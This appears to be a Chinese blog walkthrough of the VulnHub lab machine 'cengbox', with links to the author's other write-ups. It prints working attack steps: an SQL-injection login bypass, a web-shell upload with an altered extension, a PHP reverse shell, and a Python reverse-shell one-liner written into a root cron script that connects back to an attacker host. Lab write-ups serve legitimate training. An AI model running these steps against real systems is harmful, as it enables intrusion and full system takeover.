vulnhub靶機-cengbox

原創 臭nana 2020-06-30 14:54

1、使用netdiscover掃描一下靶機ip:192.168.0.107

2、nmap掃描一下目標開放端口:22、80

3、訪問80端口,沒什麼有用的信息,直接用kali自帶的dirb掃描目錄

dirb http://192.168.0.107 /usr/share/wordlists/dirb/big.txt

4、看着masteradmin和uploads兩個目錄有點可疑,猜測masteradmin應該是管理後臺,uploads應該是個保存上傳文件的目錄,應該是需要上傳文件,兩個直接訪問都是403,所以進一步掃描masteradmin目錄下的頁面

dirb http://192.168.0.107/masteradmin -X .php

5、一共掃描出了三個文件,db.php--猜測應該是存放連接數據庫的信息,login.php,upload.php--應該是上傳界面,應該就是要訪問這個界面了,直接訪問提示需要登錄,跳轉到login.php

6、看到這種輸入框,先測試一下萬能密碼和弱口令,發現admin'or 1#成功登錄,所以這裏是存在sql注入的,可以使用sql注入出用戶名和密碼

後臺賬號密碼masteradmin/C3ng0v3R00T1!

7、進入後臺之後,需要我們上傳一個文件,選擇一個木馬文件上傳,表面沒有什麼提示,其實使用ctrl+a全選,就能看到提示信息,說需要上傳一個ceng文件,也可以使用burp的重放功能

於是將文件名修改成shell.ceng重新上傳

8、這裏只是提示success,沒有說保存路徑,猜測是之前的uploads目錄,訪問之後是一片空白,猜測被當成php成功解析,傳個參進去發現執行成功,這裏猜測應該是有個.htaccess文件做了配置

9、直接蟻劍連接,可以查看下有沒有.htaccess文件證實一下猜想,發現確實是有,而且內容也是將ceng後綴解析成php格式

10、其他的就沒有發現什麼有用的信息,於是想到之前的db.php文件,試着進入數據庫看一下

mysql數據庫賬號密碼:root/SuperS3cR3TPassw0rd1!

11、這裏直接使用蟻劍的虛擬終端連接加密碼,會出現警告,說密碼不能直接在命令行,MySQL 5.6 版本對安全性進行了增強,如果在命令中使用了 -ppassword ,就會有告警提示。

mysql -uroot -pSuperS3cR3TPassw0rd1!

於是替換成

mysql -uroot -p

這樣還是不行,會報錯

想要提權到tty試試,但是蟻劍的虛擬終端似乎不行

12、反彈shell再試試,用蟻劍上傳php-reverse-shell.php,kali開啓監聽,訪問頁面,成功反彈shell

http://192.168.0.107/uploads/php-reverse-shell.php

python沒有,使用python3提權

python3 -c "import pty;pty.spawn('/bin/bash')"

13、再次嘗試連接一下mysql數據庫,成功連接,這裏雖然彈出警告,但是還是能夠連接成功,說明之前應該只是不能輸出這個結果

14、查看一下數據庫和表,cengbox數據庫的admin表,也就是我們之前sql注入出的數據

15、嘗試一下使用這個密碼登錄,所以需要登錄的用戶名

cat /etc/passwd|grep /bin/bash
root
cengover

16、嘗試之後使用cengover/C3ng0v3R00T1!成功登錄,可以直接在這裏su cengover切換,但是這個體驗感極差,可以使用ssh登錄

查看下家目錄下有沒有什麼提示性的文件,就一個user.txt文件,也沒給什麼信息,也沒有找到可以提權的命令

17、這裏需要使用pspy64查看後臺進程

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64

發現有個可以的進程,uid=0(root)執行/opt/md5check.py文件

18、修改該文件內容爲反彈shell的腳本,本地開啓監聽,稍等一會就能接收到反彈的shell

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.109",5555));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' > /opt/md5check.py

查看root.txt文件,大功告成

19、記錄一些小工具:

pspy64
revshellgen
sqlmap burpsuite co2

下一篇寫cengbox2

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

vulnhub靶機-djinn3

1、靶機ip:192.168.0.110(開機就提示:不是所有的都需要掃描發現主機) 2、掃描靶機端口 root@kali:~# nmap -A -p- 192.168.0.110 Starting Nmap 7.80 ( https

臭nana 2020-07-01 23:40:52

vulnhub靶機-djinn2

1、靶機開機後得到ip:192.168.0.107 2、掃描靶機端口,比上一個靶機多了個5000端口 21 22 1337 5000 7331 root@kali:~/桌面# nmap -p- -A 192.168.0.107 St

臭nana 2020-06-30 14:54:20

vulnhub靶機-cengbox2

1、掃描靶機ip:192.168.0.112 2、掃描靶機開放端口 21 22 80 3、訪問80端口除了下面的這個界面就沒什麼有用的信息了 4、ftp連接查看一下得到一個note.txt文件 Hey Kevin, I jus

臭nana 2020-06-30 14:54:20

vulnhub靶機-GitRoot

1、先找下ip,再掃描下端口 2、瀏覽器訪問80端口 3、修改hosts文件(windows路徑C:\Windows\System32\drivers\etc,linux路徑/etc) 添加一行gitroot.vuln 192.16

臭nana 2020-06-30 14:54:20

vulnhub靶機-djinn

1、找到靶機ip:192.168.0.108 這步可以不做,靶機開機的時候有顯示 2、掃描靶機端口 nmap -p- -A 192.168.0.108 21 22:過濾狀態 1337 7331 3、ftp進行連接,一共三個文件

臭nana 2020-06-30 14:54:20

vulnhub靶機-mrRobot

臭nana 2020-05-19 20:47:22

vulnhub靶機-My File Sever2

臭nana 2020-05-13 18:34:27

vulnhub靶機-My File Sever

臭nana 2020-05-11 00:52:29

vulnhub靶機-MoriartyCorp

臭nana 2020-05-02 12:57:18

vulnhub靶機-Lampiao

臭nana 2020-02-23 07:02:00

vulnhub靶機-djinn3

1、靶機ip:192.168.0.110(開機就提示:不是所有的都需要掃描發現主機) 2、掃描靶機端口 root@kali:~# nmap -A -p- 192.168.0.110 Starting Nmap 7.80 ( https

臭nana 2020-07-01 23:40:52

vulnhub靶機-djinn2

1、靶機開機後得到ip:192.168.0.107 2、掃描靶機端口,比上一個靶機多了個5000端口 21 22 1337 5000 7331 root@kali:~/桌面# nmap -p- -A 192.168.0.107 St

臭nana 2020-06-30 14:54:20

vulnhub靶機-cengbox2

1、掃描靶機ip:192.168.0.112 2、掃描靶機開放端口 21 22 80 3、訪問80端口除了下面的這個界面就沒什麼有用的信息了 4、ftp連接查看一下得到一個note.txt文件 Hey Kevin, I jus

臭nana 2020-06-30 14:54:20

vulnhub靶機-GitRoot

1、先找下ip,再掃描下端口 2、瀏覽器訪問80端口 3、修改hosts文件(windows路徑C:\Windows\System32\drivers\etc,linux路徑/etc) 添加一行gitroot.vuln 192.16

臭nana 2020-06-30 14:54:20

vulnhub靶機-djinn

1、找到靶機ip:192.168.0.108 這步可以不做,靶機開機的時候有顯示 2、掃描靶機端口 nmap -p- -A 192.168.0.108 21 22:過濾狀態 1337 7331 3、ftp進行連接,一共三個文件

臭nana 2020-06-30 14:54:20